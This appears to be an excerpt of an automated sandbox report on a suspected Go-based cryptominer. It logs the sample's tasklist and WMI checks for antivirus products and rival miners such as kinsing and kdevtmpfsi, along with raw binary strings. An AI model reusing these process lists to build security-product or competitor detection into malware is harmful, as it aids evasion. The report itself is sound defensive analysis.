Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;DBUSED.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NAVW32.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KAVFS.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NCOLOW.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KAVFSGT.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NORTONSECURITY.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TMNTSRV.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KTHREADDK.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NSC.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NSWSCSVC.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NUPERFSCAN.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RULEUP.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;WA_3RD_PARTY_HOST_32.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;ELAMINST.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SEFINST.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SEVNTX64.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;IPSECLOG.EXE&apos;
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: tasklist.exe, 00000010.00000003.2179984152.000001D0CC3DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'MONERO.EXE'H;.MSCPROCESS
Source: AI7f43Z7AC.exeReversingLabs: Detection: 18%
Source: AI7f43Z7AC.exeString found in binary or memory: pseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qbytes.Buffer.Grow: negative count142108547152020037174224853515625710542735760100185871124267578125too many levels of symbolic linksInitializeProcThreadAttributeListsync: RUnlock of unlocked RWMutexskip everything and stop the walkslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangereflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of range to pointer to array with length go package net: confVal.netCgo = empty hex number for chunk lengthGetVolumeNameForVolumeMountPointWwaiting for unsupported file typeGODEBUG: no value specified for "crypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto/aes: output not full blockcrypto/des: output not full blocktoo many Answers to pack (>65535)leafCounts[maxBits][maxBits] != nscalar has high bit set illegallyindefinite length found (not DER)struct contains unexported fieldsGODEBUG sys/cpu: can not enable "http2: aborting request body writehttp: persistConn.readLoop exitinghttp: read on closed response bodystream error: stream ID %d; %v; %vframe_settings_window_size_too_bigframe_windowupdate_zero_inc_streamunsupported authentication method NoDefaultCurrentDirectoryInExePath3552713678800500929355621337890625too many references: cannot spliceSetFileCompletionNotificationModes: day-of-year does not match monthslice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddti
Source: AI7f43Z7AC.exeString found in binary or memory: pseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qbytes.Buffer.Grow: negative count142108547152020037174224853515625710542735760100185871124267578125too many levels of symbolic linksInitializeProcThreadAttributeListsync: RUnlock of unlocked RWMutexskip everything and stop the walkslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangereflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of range to pointer to array with length go package net: confVal.netCgo = empty hex number for chunk lengthGetVolumeNameForVolumeMountPointWwaiting for unsupported file typeGODEBUG: no value specified for "crypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto/aes: output not full blockcrypto/des: output not full blocktoo many Answers to pack (>65535)leafCounts[maxBits][maxBits] != nscalar has high bit set illegallyindefinite length found (not DER)struct contains unexported fieldsGODEBUG sys/cpu: can not enable "http2: aborting request body writehttp: persistConn.readLoop exitinghttp: read on closed response bodystream error: stream ID %d; %v; %vframe_settings_window_size_too_bigframe_windowupdate_zero_inc_streamunsupported authentication method NoDefaultCurrentDirectoryInExePath3552713678800500929355621337890625too many references: cannot spliceSetFileCompletionNotificationModes: day-of-year does not match monthslice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddti
Source: AI7f43Z7AC.exeString found in binary or memory: failed to construct HKDF label: %sreflect: Field of non-struct type reflect: Field index out of boundsreflect: string index out of rangeunexpected runtime.netpoll error: crypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizehttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9network dropped connection on resettransport endpoint is not connectedpersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKreflect.MakeSlice of non-slice typemime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largefile type does not support deadlinebigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)flate: corrupt input before offset '_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methods444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzstrings.Builder.Grow: negative countstrings: Join output length overflowaccessing a corrupted shared libraryTime.UnmarshalBinary: invalid lengthlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with
Source: AI7f43Z7AC.exeString found in binary or memory: failed to construct HKDF label: %sreflect: Field of non-struct type reflect: Field index out of boundsreflect: string index out of rangeunexpected runtime.netpoll error: crypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizehttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9network dropped connection on resettransport endpoint is not connectedpersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKreflect.MakeSlice of non-slice typemime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largefile type does not support deadlinebigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)flate: corrupt input before offset '_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methods444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzstrings.Builder.Grow: negative countstrings: Join output length overflowaccessing a corrupted shared libraryTime.UnmarshalBinary: invalid lengthlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with
Source: AI7f43Z7AC.exeString found in binary or memory: /usr/lib/golang/src/net/addrselect.go
Source: unknownProcess created: C:\Users\user\Desktop\AI7f43Z7AC.exe "C:\Users\user\Desktop\AI7f43Z7AC.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq ksoftriqd.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq network0.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi].exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddk.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sysrv.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq c3pool.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddk.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq dbused.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kdevtmpfsi.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kinsing.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq gitlabw.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq monero.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddw.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq ARestore.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq asOELnch.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq buVss.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq cltLMH.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq cltRT.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq coInst.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq coNatHst.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq CpySnpt.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq EFAInst64.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq elaminst.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq FLDgHost.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq InstCA.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq MCUI32.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq Navw32.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq ncolow.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq NortonSecurity.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nsWscSvc.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nuPerfScan.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq RuleUp.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq SEFInst.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq Sevntx64.exe"
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq ksoftriqd.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq network0.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi].exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddk.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sysrv.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq c3pool.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddk.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq dbused.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kdevtmpfsi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kinsing.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq gitlabw.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq monero.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddw.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq ARestore.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq asOELnch.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq buVss.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq cltLMH.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq cltRT.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq coInst.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq coNatHst.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq CpySnpt.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq EFAInst64.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq elaminst.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq FLDgHost.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq InstCA.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq MCUI32.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq Navw32.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq ncolow.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq NortonSecurity.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddk.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nsWscSvc.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nuPerfScan.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq RuleUp.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq SEFInst.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq Sevntx64.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq gitlabw.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddw.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq FLDgHost.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
